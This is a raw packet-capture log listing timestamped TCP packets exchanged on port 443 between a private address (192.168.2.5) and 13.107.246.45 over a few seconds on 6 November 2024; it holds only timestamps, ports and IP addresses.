                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.581747055 CET61996443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.581765890 CET61996443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.582590103 CET4436199813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.582827091 CET4436199813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.582969904 CET61998443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.587764978 CET61996443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.587785006 CET4436199613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.588887930 CET61998443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.588893890 CET4436199813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.592129946 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.592156887 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.592220068 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593013048 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593025923 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593080044 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593106031 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593225956 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593405962 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.593414068 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.594033957 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.594046116 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.594115019 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.594249010 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.594259977 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.903712034 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.904316902 CET62000443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.904347897 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.904846907 CET62000443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:46.904861927 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.035895109 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.035974026 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.036729097 CET62000443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.036772966 CET62000443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.036772966 CET62000443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.036792994 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.036803961 CET4436200013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.041927099 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.041971922 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.042062044 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.042244911 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.042257071 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.319489956 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.320038080 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.320058107 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.320579052 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.320584059 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.322400093 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.322710037 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.322726011 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.323132992 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.323137999 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.326957941 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.327318907 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.327338934 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.327752113 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.327759027 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.448506117 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.448960066 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.449125051 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.450902939 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.450931072 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.450978041 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.451023102 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.456476927 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.456557989 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.456613064 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.466511965 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.466532946 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.466646910 CET62006443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.466653109 CET4436200613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.467962980 CET62004443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.467968941 CET4436200413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.469062090 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.469089985 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.469157934 CET62005443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.469163895 CET4436200513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.471868038 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.471904039 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.472270012 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.473423004 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.473452091 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.473795891 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474548101 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474558115 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474704027 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474715948 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474749088 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474917889 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.474929094 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.475086927 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.475100994 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.768852949 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.774970055 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.774987936 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.780889034 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.780894041 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905472040 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905572891 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905616045 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905797005 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905816078 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905826092 CET62007443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.905841112 CET4436200713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.917987108 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.918034077 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.918098927 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.919531107 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:47.919547081 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.203502893 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.204222918 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.204242945 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.205048084 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.205053091 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.213879108 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.219903946 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.219933987 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.220947981 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.220966101 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.244910955 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.245373964 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.245393038 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.245822906 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.245834112 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.331881046 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.331957102 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.332011938 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.332503080 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.332521915 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.332532883 CET62009443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.332537889 CET4436200913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.337280989 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.337327003 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.337388992 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.337635994 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.337646961 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.362931013 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.362998009 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363038063 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363065958 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363138914 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363181114 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363502979 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363519907 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363533020 CET62010443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.363538027 CET4436201013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.367377996 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.367430925 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.367515087 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.367742062 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.367759943 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381504059 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381578922 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381623030 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381635904 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381673098 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381714106 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381855011 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381875992 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381891966 CET62008443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.381896973 CET4436200813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.385488987 CET62014443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.385526896 CET4436201413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.385591984 CET62014443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.385756016 CET62014443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.385767937 CET4436201413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.650629044 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.656546116 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.656580925 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.657352924 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.657372952 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.784568071 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.784638882 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.784692049 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.785295963 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.785316944 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.785331011 CET62011443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.785336971 CET4436201113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.789462090 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.789504051 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.789561987 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.789856911 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:48.789872885 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.079176903 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.080260992 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.080260992 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.080288887 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.080303907 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.089824915 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.090284109 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.090310097 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.090717077 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.090720892 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209398985 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209434986 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209494114 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209783077 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209783077 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209822893 CET62012443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.209841013 CET4436201213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.213207960 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.213232040 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.213454008 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.213530064 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.213535070 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.234973907 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.235739946 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.235862970 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.235862970 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.236064911 CET62013443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.236079931 CET4436201313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.238825083 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.238848925 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.241884947 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.241884947 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.241913080 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.389271975 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.390368938 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.390368938 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.390414953 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.390435934 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.519939899 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.547487020 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.547518969 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.548010111 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.548015118 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881628990 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881697893 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881700993 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881757975 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881788969 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.881860971 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.882276058 CET62016443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.882303953 CET4436201613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.883642912 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.883663893 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.883848906 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.883857012 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.888170004 CET62020443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.888199091 CET4436202013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.888370991 CET62020443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890079021 CET62021443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890111923 CET4436202113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890187979 CET62021443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890379906 CET62021443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890400887 CET4436202113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890458107 CET62020443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:49.890467882 CET4436202013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.011603117 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.012038946 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.012558937 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.012582064 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013196945 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013201952 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013537884 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013551950 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013977051 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.013981104 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.141119957 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.141191959 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.141280890 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.142433882 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.142491102 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.142530918 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.142538071 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.142570019 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.153072119 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.153086901 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.153100967 CET62018443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.153105974 CET4436201813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.233256102 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.233256102 CET62017443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.233288050 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.233300924 CET4436201713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.262363911 CET62022443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.262413979 CET4436202213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.262490034 CET62022443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.265990019 CET62022443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.266004086 CET4436202213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.279690027 CET62023443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:50.279742956 CET4436202313.107.246.45192.168.2.5
